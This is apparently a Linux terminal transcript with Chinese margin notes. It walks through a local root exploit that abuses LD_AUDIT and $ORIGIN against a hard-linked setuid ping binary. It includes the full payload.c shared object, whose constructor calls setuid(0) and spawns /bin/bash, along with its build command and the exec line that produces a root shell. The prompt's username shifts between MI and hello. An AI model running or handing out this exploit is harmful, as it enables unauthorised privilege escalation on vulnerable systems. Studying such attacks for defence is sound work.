以一个普通用户MI登录
[MI@localhost tmp]$ ls -ld /tmp/ 因为tmp目录能写文件!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[MI@localhost tmp]$ cd /tmp/
[MI@localhost tmp]$ mkdir exploit
[MI@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[MI@localhost tmp]$ exec 3< /tmp/exploit/target 文件描述符,把/tmp/exploit/target定义为文件描述符3
[MI@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[MI@localhost tmp]$ cat > payload.c 必须要把c学的很明白!!
/* payload.c — a shared object whose constructor runs the moment the dynamic
 * loader maps it. In this transcript it is loaded through the LD_AUDIT="$ORIGIN"
 * step against a hard link of a setuid binary, so the constructor executes with
 * that binary's elevated identity. For defenders: a constructor that pairs
 * setuid(0) with system() in a .so dropped under a world-writable path such as
 * /tmp is the indicator to alert on. No headers are included; the build line's
 * gcc -w presumably suppresses the implicit-declaration warnings that causes. */
void __attribute__((constructor)) init()
{
setuid(0);           /* request uid 0; succeeds only if the process already holds root privilege */
system("/bin/bash"); /* spawn an interactive shell under that identity */
}
[MI@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[MI@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[MI@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 定义环境变量
[root@localhost tmp]# whoami
root
--------------